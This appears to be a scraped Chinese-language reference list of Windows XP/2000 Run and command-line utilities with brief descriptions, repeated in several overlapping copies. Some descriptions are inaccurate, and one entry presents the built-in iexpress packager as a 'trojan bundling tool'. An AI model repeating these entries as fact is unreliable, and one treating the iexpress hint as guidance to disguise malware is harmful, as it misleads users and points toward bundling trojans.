diskmgmt.msc---磁碟管理實用程序
dcomcnfg-------打開系統組件服務
ddeshare-------打開DDE共享設置
dvdplay--------DVD播放器

net stop messenger-----停止信使服務
net start messenger----開始信使服務
notepad--------打開記事本
nslookup-------網路管理的工具向導
ntbackup-------系統備份和還原
narrator-------屏幕「講述人」
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員C作請求
netstat -an----(TC)命令檢查介面

syncapp--------創建一個公文包
sysedit--------系統配置編輯器
sigverif-------文件簽名驗證程序
sndrec32-------錄音機
shrpubw--------創建共享文件夾
secpol.msc-----本地安全策略
syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
services.msc---本地服務設置
Sndvol32-------音量控製程序
sfc.exe--------系統文件檢查器
sfc /scannow---windows文件保護

tsshutdn-------60秒倒計時關機命令
tourstart------xp簡介(安裝完成後出現的漫遊xp程序)
taskmgr--------任務管理器

eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打開資源管理器

packager-------對象包裝程序
perfmon.msc----計算機性能監測程序
progman--------程序管理器

regedit.exe----注冊表
rsop.msc-------組策略結果集
regedt32-------注冊表編輯器
rononce -p ----15秒關機
regsvr32 /u *.dll----停止dll文件運行
regsvr32 /u zipfldr.dll------取消ZIP支持

cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁碟檢查
certmgr.msc----證書管理實用程序
calc-----------啟動計算器
charmap--------啟動字元映射表
cliconfg-------SQL SERVER 客戶端網路實用程序
Clipbrd--------剪貼板查看器
conf-----------啟動netmeeting
compmgmt.msc---計算機管理
cleanmgr-------垃圾整理
ciadv.msc------索引服務程序

osk------------打開屏幕鍵盤
odbcad32-------ODBC數據源管理器
oobe/msoobe /a----檢查XP是否激活
lusrmgr.msc----本機用戶和組
logoff---------注銷命令

iexpress-------木馬捆綁工具,系統自帶

Nslookup-------IP地址偵測器

fsmgmt.msc-----共享文件夾管理器

utilman--------輔助工具管理器

gpedit.msc-----組策略

...-----我的電腦

winver 檢查Windows版本
wmimgmt.msc 打開Windows管理體系結構(wmi)
wupdmgr Windows更新程序
wscript Windows腳本宿主設置
write 寫字板
winmsd 系統信息
wiaacmgr 掃描儀和照相機向導
winchat xp自帶區域網聊天
mem.exe 顯示內存使用情況
msconfig.exe 系統配置實用程序
mplayer2 簡易widnows media player
mspaint 畫圖板
mstsc 遠程桌面連接
mplayer2 媒體播放機
magnify 放大鏡實用程序
mmc 打開控制台
mobsync 同步命令

dxdiag 檢查directx信息
drwtsn32 系統醫生
devmgmt.msc 設備管理器
dfrg.msc 磁碟碎片整理程序
diskmgmt.msc 磁碟管理實用程序
dcomcnfg 打開系統組件服務
ddeshare 打開dde共享設置
dvdplay dvd播放器

net stop messenger 停止信使服務
net start messenger 開始信使服務
notepad 打開記事本
nslookup 網路管理的工具向導
ntbackup 系統備份和還原
narrator 屏幕「講述人」
ntmsmgr.msc 移動存儲管理器
ntmsoprq.msc 移動存儲管理員操作請求
netstat -an (tc)命令檢查介面

syncapp 創建一個公文包
sysedit 系統配置編輯器
sigverif 文件簽名驗證程序
sndrec32 錄音機
shrpubw 創建共享文件夾
secpol.msc 本地安全策略
syskey 系統加密,一旦加密就不能解開,保護Windows xp系統的雙重密碼
services.msc 本地服務設置
sndvol32 音量控製程序
sfc.exe 系統文件檢查器
sfc /scannow windows文件保護 tsshutdn 60秒倒計時關機命令
tourstart xp簡介(安裝完成後出現的漫遊xp程序)
taskmgr 任務管理器

eventvwr 事件查看器
eudcedit 造字程序
explorer 打開資源管理器

packager 對象包裝程序
perfmon.msc 計算機性能監測程序
progman 程序管理器

regedit.exe 注冊表
rsop.msc 組策略結果集
regedt32 注冊表編輯器
rononce -p 15秒關機
regsvr32 /u *.dll 停止dll文件運行
regsvr32 /u zipfldr.dll 取消zip支持

cmd.exe cmd命令提示符
chkdsk.exe chkdsk磁碟檢查
certmgr.msc 證書管理實用程序
calc 啟動計算器
charmap 啟動字元映射表
cliconfg sql server 客戶端網路實用程序
clipbrd 剪貼板查看器
conf 啟動netmeeting
compmgmt.msc 計算機管理
cleanmgr 垃圾整理
ciadv.msc 索引服務程序

osk 打開屏幕鍵盤
odbcad32 odbc數據源管理器
oobe/msoobe /a 檢查xp是否激活
lusrmgr.msc 本機用戶和組
logoff 注銷命令

iexpress 木馬捆綁工具,系統自帶

nslookup ip地址偵測器

fsmgmt.msc 共享文件夾管理器

utilman 輔助工具管理器

gpedit.msc 組策略

以下為Windows操作系統的常用運行命令,執行這些命令,就能打開系統對應的相關實用程序,如果大家能基本利用,就能檢查並修復系統的最基本的故障,除注銷,關閉系統命令外,其它所有命令,大家不妨一試!!

運行\輸入CMD\輸入 對應的相關實用程序:
. 打開C:\Documents and Settings\XXX(當前登錄Windows XP的用戶名)
.. 打開Windows XP所在的盤符下的Documents and Settings文件夾
... 打開「我的電腦」選項。
accwiz.exe 輔助工具向導
actmovie.exe 直接顯示安裝工具
append.exe 允許程序打開制定目錄中的數據
arp.exe 顯示和更改計算機的IP與硬體物理地址的對應列表
at.exe 計劃運行任務
atmadm.exe ATM調用管理器統計
attrib.exe 顯示和更改文件和文件夾屬性
autochk.exe 檢測修復文件系統 (XP不可用)
autoconv.exe 在啟動過程中自動轉化系統 (XP不可用)
autofmt.exe 在啟動過程中格式化進程 (XP不可用)
autolfn.exe 使用長文件名格式 (XP不可用)
arp.exe 顯示和更改計算機的IP與硬體物理地址的對應
calc.exe 計算器
Bootvrfy.exe 通報啟動成功
cacls.exe 顯示和編輯ACL
cdplayer.exe CD播放器
change.exe 與終端伺服器相關的查詢 (XP不可用)
charmap.exe 字元映射表
chglogon.exe 啟動或停用會話記錄 (XP不可用)
chgport.exe 改變埠(終端服務) (XP不可用)
chgusr.exe 改變用戶(終端服務) (XP不可用)
chkdsk.exe 磁碟檢測程序
chkntfs.exe NTFS磁碟檢測程序
cidaemon.exe 組成Ci文檔服務
cipher.exe 在NTFS上顯示或改變加密的文件或目錄
cisvc.exe 打開索引內容
ckcnv.exe 變換Cookie
cleanmgr.exe 磁碟清理
cliconfg.exe SQL客戶網路工具
clipbrd.exe 剪貼簿查看器
clipsrv.exe 運行Clipboard服務
clspack.exe 建立系統文件列表清單
cluster.exe 顯示域的集群 (XP不可用)
cmd.exe 進2000\XP DOS
cmdl32.exe 自動下載連接管理
cmmgr32.exe 連接管理器
cmmon32.exe 連接管理器監視
cmstp.exe 連接管理器配置文件安裝程序
comclust.exe 集群
comp.exe 比較兩個文件和文件集的內容
conf 啟動netmeeting聊天工具
control userpasswords2 XP密碼管理.
compmgmt.msc 計算機管理
cprofile.exe 轉換顯示模式 (XP不可用)
開始,運行,輸入CMD\輸入net config workstation計算機名 \完整的計算機名\用戶名
工作站處於活動狀態(即網路描述) \軟體版本(即軟體版本號) \工作站域 工作站域的 DNS 名稱
登錄域 \COM 打開時間超時(秒) \COM 發送量(位元組) \COM 發送超時 (msec)
CMD\輸入net config workstation 更改可配置工作站服務設置。
CMD\輸入net config server 可以顯示不能配置的下伺服器計算機名 \伺服器注釋 \伺服器版本(即軟體版本號)
伺服器處於活動狀態(即網路描述) \伺服器處於隱藏狀態(即 /hidden 設置)
最大登錄用戶數(即可使用伺服器共享資源的最大用戶數)
每個會話打開文件的最大數(即用戶可在一個會話中打開伺服器文件的最大數)
空閑會話時間(最小值)
chkdsk.exe 磁碟檢查.
Chkdsk /r 2000命令控制台中的Chkdsk /r命令檢查修復系統文件
cleanmgr 垃圾整理
Clipbrd 剪貼板查看器
C:boot.ini 打開啟動菜單
compact.exe 顯示或改變NTFS分區上文件的壓縮狀態
conime.exe IME控制台
control.exe 控制面板
convert.exe NTFS 轉換文件系統到NTFS
convlog.exe 轉換IIS日誌文件格式到NCSA格式
cprofile.exe 轉換顯示模式
cscript.exe 較本宿主版本
csrss.exe 客戶伺服器Runtime進程 (XP不可用)
csvde.exe 格式轉換程序 (XP不可用)
dcpromo 活動目錄安裝(XP不可用)
drwtsn32 系統醫生
diskmgmt.msc 磁碟管理器(和PowerQuest PartitionMagic 8.0)
dvdplay DVD 播放器
devmgmt.msc 設備管理器(檢查電腦硬體,驅動)
dxdiag 檢查DirectX信息
dcomcnfg.exe DCOM配置屬性 (控制台根目錄)
dcpromo.exe 安裝向導 (XP不可用)
ddeshare.exe DDE共享
debug.exe 檢查DEBUG
dfrgfat.exe FAT分區磁碟碎片整理程序
dfrgntfs.exe NTFS分區磁碟碎片整理程序 (XP不可用)
dfs_cmd_.exe 配置DFS樹 (XP不可用)
dfsinit.exe 分布式文件系統初始化(XP不可用)
dfssvc.exe 分布式文件系統伺服器 (XP不可用)
diantz.exe 製作CAB文件
diskperf.exe 磁碟性能計數器
dmremote.exe 磁碟管理服務的一部分 (XP不可用)
doskey.exe 命令行創建宏
dosx.exe DOS擴展
dplaysvr.exe 直接運行幫助 (XP不可用)
drwatson.exe 華生醫生錯誤檢測
drwtsn32.exe 華生醫生顯示和配置管理
dvdplay.exe DVD播放
dxdiag.exe Direct-X診斷工具
edlin.exe 命令行的文本編輯
esentutl.exe MS資料庫工具
eudcedit.exe 造字程序
eventvwr.exe 事件查看器
exe2bin.exe 轉換EXE文件到二進制
expand.exe 解壓縮
extrac32.exe 解CAB工具
fsmgmt.msc 共享文件夾
fastopen.exe 快速訪問在內存中的硬碟文件
faxcover.exe 傳真封面編輯
faxqueue.exe 顯示傳真隊列
faxsend.exe 發送傳真向導
faxsvc.exe 啟動傳真服務
fc.exe 比較兩個文件的不同
find.exe 查找文件中的文本行
findstr.exe 查找文件中的行
finger.exe 一個用戶並顯示出統計結果
fixmapi.exe 修復MAPI文件
flattemp.exe 允許或者禁用臨時文件目錄 (XP不可用)
fontview.exe 顯示字體文件中的字體
forcedos.exe 強制文件在DOS模式下運行
ftp.exe FTP下載
gpedit.msc 組策略
gdi.exe 圖形界面驅動
grpconv.exe 轉換程序管理員組
hostname.exe 顯示機器的Hostname
Internat 輸入法圖標
iexpress 木馬捆綁工具,系統自帶
ieshwiz.exe 自定義文件夾向導
iexpress.exe iexpress安裝包
iisreset.exe 重啟IIS服務(未安裝IIS,不可用)
internat.exe 鍵盤語言指示器 (XP不可用)
ipconfig.exe 查看IP配置
ipsecmon.exe IP安全監視器
ipxroute.exe IPX路由和源路由控製程序
irftp.exe 無線連接
ismserv.exe 安裝或者刪除Service Control Manager中的服務
jdbgmgr.exe Java4的調試器
jetconv.exe 轉換Jet Engine資料庫 (XP不可用)
jetpack.exe 壓縮Jet資料庫 (XP不可用)
jview.exe Java的命令行裝載者
label.exe 改變驅動器的卷標
lcwiz.exe 許可證向導 (XP不可用)
ldifde.exe LDIF目錄交換命令行管理 (XP不可用)
licmgr.exe 終端服務許可協議管理 (XP不可用)
lights.exe 顯示連接狀況 (XP不可用)
llsmgr.exe Windows 2000 許可協議管理 (XP不可用)
llssrv.exe 啟動許可協議伺服器 (XP不可用)
locator.exe RPC Locator 遠程定位
lodctr.exe 調用性能計數
logoff.exe 注銷當前用戶
lpq.exe 顯示遠端的LPD列印隊列的狀態,顯示被送到基於Unix的伺服器的列印任務
lpr.exe 用於Unix客戶列印機將列印任務發送給連接了列印設備的NT的列印機伺服器。
lsass.exe 運行LSA和Server的DLL
lserver.exe 指定默認Server新的DNS域 (XP不可用)
lusrmgr.msc 本地賬戶管理
mmc 控制台
mplayer2 播放器
macfile.exe 管理MACFILES (XP不可用)
magnify.exe 放大鏡
makecab.exe 製作CAB文件
mem.exe 顯示內存狀態
migpwd.exe 遷移密碼
mmc.exe 控制台
mnmsrvc.exe 遠程桌面共享
mobsync.exe 同步目錄管理器
mountvol.exe 創建、刪除或列出卷的裝入點。
mplay32.exe Media Player 媒體播放器
mpnotify.exe 通知應用程序
mqbkup.exe 信息隊列備份和恢復工具
mqmig.exe MSMQ Migration Utility 信息隊列遷移工具
mrinfo.exe 使用SNMP多點傳送路由
mscdexnt.exe 安裝MSCD
msdtc.exe 動態事務處理控制台
msg.exe 發送消息到本地或遠程客戶
mshta.exe HTML應用程序主機
msiexec.exe 開始Windows安裝程序
mspaint.exe 打開畫圖板
mstask.exe 任務計劃表程序
mstinit.exe 任務計劃表安裝
Msconfig.exe 系統配置實用程序 (配置啟動選項,服務項)
mem.exe 顯示內存使用情況
mspaint 畫圖板
Net Stop Messenger 停止信使服務
Net Start Messenger 恢復信使服務
nslookup 網路管理的工具
Nslookup IP 地址偵測器
ntbackup 系統備份和還原
nbtstat.exe 使用 NBT(TCP/IP 上的 NetBIOS)顯示協議統計和當前 TCP/IP 連接。
nddeapir.exe NDDE API伺服器端
netsh.exe 用於配置和監控 Windows 2000 命令行腳本介面(XP不可用)
netstat.exe 顯示協議統計和當前的 TCP/IP 網路連接。
nlsfunc.exe 載入特定國家的信息。Windows 2000 和 MS-DOS 子系統不使用該命令接受該命令只是為了與 MS-DOS 文件兼容。
notepad.exe 打開記事本
nslookup.exe 該診斷工具顯示來自域名系統 (DNS) 名稱伺服器的信息。
ntbackup.exe 備份和故障修復工具
ntfrs.exe NT文件復制服務 (XP不可用)
ntvdm.exe 模擬16位Windows環境
nw16.exe NetWare轉向器
nwscript.exe 運行Netware腳本
odbcad32.exe 32位ODBC數據源管理 (驅動程序管理)
odbcconf.exe 命令行配置ODBC驅動和數據源
packager.exe 對象包裝程序
pathping.exe 包含Ping和Tracert的程序
pentnt.exe 檢查Pentium的浮點錯誤
perfmon.exe 系統性能監視器
ping.exe 驗證與遠程計算機的連接
posix.exe 用於兼容Unix
print.exe 列印文本文件或顯示列印隊列的內容。
progman.exe 程序管理器
psxss.exe Posix子系統應用程序
qappsrv.exe 在網路上顯示終端伺服器可用的程序
qprocess.exe 在本地或遠程顯示進程的信息(需終端服務)
query.exe 查詢進程和對話 (XP不可用)
quser.exe 顯示用戶登陸的信息(需終端服務)
qwinsta.exe 顯示終端服務的信息
rononce -p 15秒關機
rasAdmin 遠程訪問服務.
regedit.exe 注冊表編輯器
rasadmin.exe 啟動遠程訪問服務 (XP不可用)
rasautou.exe 建立一個RAS連接
rasdial.exe 寬頻,撥號連接
ras.exe 運行RAS連接 (XP不可用)
rcp.exe 計算機和運行遠程外殼埠監控程序 rshd 的系統之間復制文件
rdpclip.exe 終端和本地復制和粘貼文件
recover.exe 從壞的或有缺陷的磁碟中恢復可讀取的信息。
redir.exe 運行重定向服務
regedt32.exe 32位注冊服務
regini.exe 用腳本修改注冊許可
regwiz.exe 注冊向導
replace.exe 用源目錄中的同名文件替換目標目錄中的文件。
rexec.exe rexec 命令在執行指定命令前,驗證遠程計算機上的用戶名,只有安裝了 TCP/IP 協議後才可以使用該命令。
risetup.exe 運行遠程安裝向導服務 (XP不可用)
route.exe 控制網路路由表
rsh.exe 在運行 RSH 服務的遠程計算機上運行命令
rsnotify.exe 遠程存儲通知回顯
runas.exe 允許用戶用其他許可權運行指定的工具和程序
rundll32.exe 啟動32位DLL程序
rwinsta.exe 重置會話子系統硬體和軟體到最初的值
Sndvol32 音量控製程序
sfc.exe 或CMD\ sfc.exe 回車 系統文件檢查器
services.msc 網路連接服務
syskey 系統加密,(一旦加密就不能解開,保護windows xp系統的雙重密碼wupdmgr WIDNOWS UPDATE)
SCANREG/RESTORE 命令恢復最近的注冊表
secedit.exe 自動化安全性配置管理
services.exe 控制所有服務
sethc.exe 設置高對比
setver.exe 設置 MS-DOS 子系統向程序報告的 MS-DOS 版本號
sfc.exe 系統文件檢查
shadow.exe 監控另外一台中端伺服器會話
shrpubw.exe 建立和共享文件夾
sigverif.exe 文件簽名驗證
smlogsvc.exe 性能日誌和警報 (XP不可用)
sndrec32.exe 錄音機
sndvol32.exe 顯示聲音控制信息
snmp.exe 簡單網路管理協議 (XP不可用)
snmptrap.exe SNMP工具 (XP不可用)
srvmgr.exe 伺服器管理器 (XP不可用)
subst.exe 將路徑與驅動器盤符關聯
sysedit.exe 系統配置編輯器
syskey.exe NT賬號資料庫加密工具
sysocmgr.exe > Windows 安裝程序
systray.exe 在低許可權運行systray
taskmgr 任務管理器
tasklist /svc(CMD)了解每個SVCHOST進程到底提供了多少系統服務(2000\98不可用)
tlist -S(CMD) 了解每個SVCHOST進程到底提供了多少系統服務(
taskman.exe 任務管理器 (XP不可用)
taskmgr.exe 任務管理器
tcmsetup.exe 電話服務客戶安裝
tcpsvcs.exe TCP服務
termsrv.exe 終端服務
tftp.exe 將文件傳輸到正在運行 TFTP 服務的遠程計算機或從正在運行 TFTP 服務的遠程計算機傳輸文件
themes.exe 桌面主題 (XP不可用)
tlntadmn.exe Administrator Telnet服務管理
tlntsess.exe 顯示目前的Telnet會話
tlntsvr.exe 開始Telnet服務
tracert.exe 診斷實用程序將包含不同生存時間 (TTL) 值的 Internet 控制消息協議 (ICMP) 回顯數據包發送到目標,以決定到達目標採用的路由
tsadmin.exe Administrator 終端服務管理器 (XP不可用)
tscon.exe 粘貼用戶會話到終端對話
tsdiscon.exe 斷開終端服務的用戶
tskill.exe 殺掉終端服務
tsprof.exe 用終端服務得出查詢結果
tsshutdn.exe 關閉系統
unlodctr.exe 性能監視器的一部分
upg351db.exe 升級Jet資料庫 (XP不可用)
ups.exe UPS service UPS服務
user.exe Windows核心服務
userinit.exe 打開我的文檔
usrmgr.exe 域用戶管理器
utilman.exe 指定2000啟動時自動打開那台機器
vwipxspx.exe 調用IPX/SPX VDM
w32tm.exe 時間伺服器
wextract.exe 解壓縮Windows文件
winchat.exe 打開Windows聊天工具
winhlp32.exe 運行幫助系統
winmsd.exe 查看系統信息
winver.exe 顯示Windows版本
wizmgr.exe Windows管理向導 (XP不可用)
wjview.exe Java 命令行調用Java
write.exe 打開寫字板
wscript.exe 腳本工具
wupdmgr.exe Windows update 運行Windows update升級向導
winver 檢查Windows版本
Win98系統工具
開始,運行,輸入Msconfig 系統配置實用工具 配置啟動選項,包括config.sys、autoexec.bat、win.ini、system.ini和注冊表及程序菜單中的啟動項。並可設置是否故障啟動。
開始,運行,輸入Regedit 注冊表修改工具 注冊表編輯器,如果沒有把握不要隨意修改注冊表!
開始,運行,輸入Regsvr32 dll注冊工具 當提示找不到dll文件時,可用此來注冊該動態連接庫。
開始,運行,輸入Regwiz 注冊向導 用於注冊。校驗系統文件,並可恢復系統文件。
如果啟動時出現類似*.vxd文件錯誤,可用此恢復該vxd文件。
開始,運行,輸入Scandskw 磁碟掃描程序,用於掃描修復磁碟。如果磁碟或文件出現錯誤,可用來初步修復。
開始,運行,輸入DxDiag DirectX診斷工具可用於檢測DirectX運行是否正常。
開始,運行,輸入NETSCAPE

ESC:清除當前命令行;
F7:顯示命令歷史記錄,以圖形列表窗的形式給出所有曾經輸入的命令,並可用上下箭頭鍵選擇再次執行該命令。
F8:搜索命令的歷史記錄,循環顯示所有曾經輸入的命令,直到按下回車鍵為止;
F9:按編號選擇命令,以圖形對話框方式要求您輸入命令所對應的編號(從0開始),並將該命令顯示在屏幕上;
Ctrl+H:刪除游標左邊的一個字元;
Ctrl+C Ctrl+Break,強行中止命令執行;
Ctrl+M:表示回車確認鍵;
Alt+F7:清除所有曾經輸入的命令歷史記錄;
Alt+PrintScreen:截取屏幕上當前命令窗里的內容。
病毒破壞了系統文件,請使用殺毒軟體查殺病毒,然後利用Windows 2000提供的「命令控制台」中的Chkdsk /r命令檢查修復系統文件即可。

按F8進入DOS模式,運行SCANREG/RESTORE命令恢復最近的注冊表
按F8進入安全模式,在運行里輸入SFC,系統文件檢查

熱點內容
鳳凰地下商城wifi密碼是多少 發布:2025-02-04 14:42:00 瀏覽:902
哈希查找演算法 發布:2025-02-04 14:40:36 瀏覽:465
雲伺服器顯示黑洞 發布:2025-02-04 14:29:05 瀏覽:300
redhatlinux教程 發布:2025-02-04 14:24:48 瀏覽:831
nvidia緩存清理嗎 發布:2025-02-04 14:16:55 瀏覽:307
筆記本電腦如何設置鎖屏密碼 發布:2025-02-04 13:54:42 瀏覽:163
構成c語言程序的基本單位 發布:2025-02-04 13:49:53 瀏覽:990
如何修改已經更改的密碼 發布:2025-02-04 13:38:38 瀏覽:776
唐dm2021買哪個配置劃算 發布:2025-02-04 13:38:38 瀏覽:628
真空壓縮重 發布:2025-02-04 13:38:37 瀏覽:643